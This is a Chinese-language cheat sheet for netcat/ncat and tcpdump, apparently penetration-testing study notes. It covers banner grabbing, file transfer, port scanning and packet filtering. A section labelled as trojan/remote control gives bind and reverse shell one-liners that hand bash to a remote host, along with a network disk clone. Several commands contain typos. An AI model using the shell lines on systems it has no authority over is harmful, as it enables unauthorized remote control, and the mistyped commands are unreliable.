安全工具-Nc/ncat使用

Nc/ncat

侦听模式 / 传输模式

telnet / 获取banner信息

nc -nv 1.1.1.1 110
nc -nv 1.1.1.1 25
nc -nv 1.1.1.1 80

传输⽂本信息

nc -l -p 4444   //服务器启动进程  -q 1  传输完成退出   > test.txt  写入文件
nc -nv 1.1.1.1 4444

传输⽂件/目录

传输文件

A:nc -lp 333 >1.mp4
B:nc -nv 1.1.1.1 333 <1.mp4 -q 1 
或
A:nc -q 1 -lp 333 < a.mp4
B:nc -nv 1.1.1.1 333 > 2.mp4

传输目录

A:tar -cvf - music/ | nc -lp 333 -q 1
B:nc -nv 1.1.1.1 333 | tar -xvf -

加密传输⽂件

A:nc -lp 333 | mcrypt --flush -Fbgd -a rijndael-256 -m ecb > 1.mp4
B:mcrypt --flush -Fbq -a ijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

这里需要输入一个密码

远程控制/⽊⻢

正向
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333 

反向：
A:nc -lp 333
B:nc 1.1.1.1 333 -c bash
如果是Windows用户把bash 改成 cmd

加密所有流量

A:ncat ncat -c bash -allow 192.168.20.14 -vnl 333 --ssl
B:ncat -nv 1.1.1.1 333 --ssl

流媒体服务器

A:cat 1.mp4 | nc -lp 333
B:nc -nv 1.1.1.1 333 | mplayer -vo xll -cache 3000 - 

远程克隆硬盘

A:nc -lp 333 | dd of=/dev/sda
B dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

端口扫描

nc -nvz 1.1.1.1 1-65535   //-z是扫描模式
nc -vnzu 1.1.1.1 1-1024

Tcpdump

默认只抓每一个数据包的前68个字节

抓包
Tcpdump -i eth0 -s 0 -w file.pcap
Tcpdump -i eth0 port 22

读取抓包文件
Tcpdump -r file.pcap

筛选

tcpdump -n -r http.cap | awk '{print $3}' | sort -u    //-n不对ip地址做域名解析
tcpdump -n src host x.x.x.x -r http.cap   //只显示来源ip是x.x.x.x的包
tcpdump -n dst host x.x.x.x -r http.cap   //只显示目标ip是x.x.x.x的包
tcpdump -n port 53 -r http.cap
tcpdump -nX port 80 -r http.cap   //-x是十六位表示

高级筛选

tcpdump -A -n 'tcp[13] = 24' - r http.cap